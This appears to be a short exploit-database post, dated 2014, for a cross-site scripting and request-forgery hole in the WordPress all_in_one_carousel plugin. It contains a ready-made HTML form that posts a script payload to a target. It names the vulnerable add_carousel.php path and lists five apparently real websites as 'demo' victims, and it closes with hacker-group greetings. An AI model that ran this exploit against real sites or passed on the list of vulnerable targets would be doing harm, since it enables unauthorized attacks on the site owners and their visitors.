# Exploit : <center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability </center><br><br> <html> <head> <title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability [IeDb TeaM]</title> </head><body> <form action=\"http://YourTarget.Com\"; id=\"formid\" method=\"post\"> <input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br> <input type=\"submit\" value=\"Submit\"/> </form></body></html> # # XSS Code : \"><script>alert(/IeDb.ir/)</script> # # Vulnerable Page : # # Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php # # # [+] Image : http://sectime.ir/myfiles/Xss-wp.png # # # # D3m0 : # # http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php # # # Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And .... ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04] ###########################
